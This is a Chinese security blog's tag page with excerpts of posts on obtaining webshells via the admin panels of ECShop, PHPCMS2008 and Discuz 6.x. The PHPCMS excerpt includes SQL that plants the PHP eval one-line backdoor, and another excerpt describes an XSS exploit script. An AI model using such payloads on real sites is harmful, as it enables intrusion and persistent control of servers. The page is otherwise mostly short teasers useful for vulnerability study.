Tag: webshell预览模式: 普通 | 列表

ECShop网店系统< =V2.6.2 后台拿webshell

作者:oldjun

ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。(官方介绍)

ECSHOP前段时间出了个注射漏洞:http://bbs.wolvez.org/topic/67/,拿后台权限应该没有问题,但文章没有提及如何在后台拿shell。昨天可乐在t00ls.Net上发帖问如何拿shell,无聊中我baidu、 google了下,网上貌似没有拿shell的办法。好久没读代码了,无聊中下了ECSHOP最新版(V2.6.2)的源码过来读,很庆幸,给我找到一个可以直接写shell的文件。与注射一样,同样是个变化未初始化导致的问题,于是,同样只能用在register_globals为on的环境下。

查看更多...

Tags: ECShop webshell

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 62

PHPCMS2008 后台拿webshell

进去后
Create TABLE b (cmd text NOT NULL);
Insert INTO b (cmd) VALUES('<?php @eval($_POST[xh4t]);?>');
//在字段cmd中插入一句话木马,木马内容为<?php @eval($_POST[xh4t]);?>
前3句都尅执行成功最后一句执行后显示空白

查看更多...

Tags: phpcms webshell

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 204

discuz6.1后台拿webshell方法



很多朋友有了discuz6.x后台 无法得到 shell
除了 0day等方法可以拿shell 就没别的办法了 
网上也有很多但是大多不能用 

查看更多...

Tags: Discuz webshell

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 92

Discuz XSS得webshell

By racle @tian6.com
欢迎转帖.但请保留版权信息.
受影响版本:Discuz<=6.1.0,gbk+utf+big5

新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.

查看更多...

Tags: Discuz webshell

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 84